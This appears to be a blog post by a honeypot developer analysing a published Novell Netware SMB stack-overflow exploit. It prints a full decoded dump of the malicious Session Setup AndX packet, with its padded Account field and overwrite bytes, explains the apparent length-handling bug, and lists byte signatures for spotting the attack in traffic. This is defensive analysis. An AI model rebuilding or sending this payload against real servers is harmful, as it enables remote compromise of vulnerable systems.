I just had a look on the Novell Netware exploit published by Laurent Gaffié, and I'm glad other people have problems parsing smb correctly too. Contrary to other exploit - addressing Microsofts SMB stack - this one exploits a parsing bug instead of a DCE Remote Procedure Call.

###[ NBT Session Packet sizeof(4) ]### 
  TYPE                = Session Message sizeof(  1) off=  0 goff=  0
  RESERVED            = 0               sizeof(  1) off=  1 goff=  1
  LENGTH              = 318             sizeof(  2) off=  2 goff=  2
###[ SMB Header sizeof(32) ]### 
     Start               = b'\xffSMB'      sizeof(  4) off=  0 goff=  4
     Status              = 0               sizeof(  4) off=  5 goff=  9
     Flags               = CANON           sizeof(  1) off=  9 goff= 13
     Flags2              =                 sizeof(  2) off= 10 goff= 14
     PIDHigh             = 0               sizeof(  2) off= 12 goff= 16
     Signature           = 0               sizeof(  8) off= 14 goff= 18
     Unused              = 0               sizeof(  2) off= 22 goff= 26
     TID                 = 0               sizeof(  2) off= 24 goff= 28
     PID                 = 6649            sizeof(  2) off= 26 goff= 30
     UID                 = 1               sizeof(  2) off= 28 goff= 32
     MID                 = 24961           sizeof(  2) off= 30 goff= 34
###[ SMB Sessionsetup AndX Request2 sizeof(114) ]### 
        WordCount           = 13              sizeof(  1) off=  0 goff= 36
        AndXCommand         = SMB_COM_TREE_CONNECT_ANDX sizeof(  1) off=  1 goff= 37
        AndXReserved        = 0               sizeof(  1) off=  2 goff= 38
        AndXOffset          = 122             sizeof(  2) off=  3 goff= 39
        MaxBufferSize       = 2920            sizeof(  2) off=  5 goff= 41
        MaxMPXCount         = 50              sizeof(  2) off=  7 goff= 43
        VCNumber            = 0               sizeof(  2) off=  9 goff= 45
        SessionKey          = 0               sizeof(  4) off= 11 goff= 47
        PasswordLength      = 24              sizeof(  2) off= 15 goff= 51
        UnicodePasswordLength= 0               sizeof(  2) off= 17 goff= 53
        Reserved2           = 0               sizeof(  4) off= 19 goff= 55
        Capabilties         = UNICODE         sizeof(  4) off= 23 goff= 59
        ByteCount           = 61              sizeof(  2) off= 27 goff= 63
        Password            = b'(\xd4\xce\xd7\x93\xc8\x8b\x16_B*z\xfd\x15z\xfd\x15z\xfdAAAAA' sizeof( 24) off= 29 goff= 65
        UnicodePassword     = b''             sizeof(  0) off= 53 goff= 89
        Padding             = b'A'            sizeof(  1) off= 53 goff= 89
        Account             = b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xa5B^\\-K\x1a\x1cYO\x00' sizeof(206) off= 54 goff= 90
        PrimaryDomain       = b'WORKGROUP\x00' sizeof( 10) off=260 goff=296
        NativeOS            = b'Windows 4.0\x00' sizeof( 12) off=270 goff=306
        NativeLanManager    = b'Windows 4.0\x00' sizeof( 12) off=282 goff=318
        Extrabytes          = b''             sizeof(-180) off=294 goff=330
###[ SMB Treeconnect AndX Request sizeof(42) ]### 
           WordCount           = 4               sizeof(  1) off=  0 goff=150
           AndXCommand         = SMB_COM_NONE    sizeof(  1) off=  1 goff=151
           Reserved1           = 0               sizeof(  1) off=  2 goff=152
           AndXOffset          = 0               sizeof(  2) off=  3 goff=153
           Flags               = 0x2             sizeof(  2) off=  5 goff=155
           PasswordLength      = 1               sizeof(  2) off=  7 goff=157
           ByteCount           = 31              sizeof(  2) off=  9 goff=159
           Password            = b'\x00'         sizeof(  1) off= 11 goff=161
           Path                = b'\\\\WIN-E7J0ONIMSE3\\USERS\x00' sizeof( 24) off= 12 goff=162
           Service             = b'?????\x00'    sizeof(  6) off= 36 goff=186
           Extrabytes          = b'\x00'         sizeof(  0) off= 42 goff=192

Sessionsetup AndX / Treeconnect AndX

The exploit says, the large Account string causes an stack overflow.
I guess, which is the best I can do, as I lack Netware, they relied on the SMB_Sessionsetup_AndX.ByteCount value to allocate a buffer locally on the stack. As ByteCount is used to indicate the length of rest of the packet, this assumption is valid, but as usual, relying on the user provided value is not.

Pretty cool to see something which exploits a parsing bug and uses SMB AndX chaining.

wireshark failed to decode the chained Treeconnect_AndX, the previous SMB_Sessionsetup_AndX.NativeLanManager field is not decoded correctly too, but my wireshark is not current, and there have been lots of changes in trunk-1.4, so maybe this is fixed already.

dionaea had its problems in decoding the packet too, but as we use python to interpret the packet, it failed better, all I got was an exception.
Problem was the chaining, as this is the first chaining I see, and which is not implemented correctly therefore, but it was easy to hardcode some fix to get it parsed.
And you can see, the length of the SMB_Sessionsetup_AndX.Extrabytes field, which is used to calculate some kind of padding, is negative (-180), as ByteCount is much smaller than it should be.

Maybe there is some value for others in this information, e.g. you see the the string \\\\WIN-E7J0ONIMSE3\\USERS or the bytes 28 d4 ce d7 93 c8 8b 16 5f 42 2a 7a fd 15 7a fd 15 7a fd 41 41 41 41 41 in your network traces.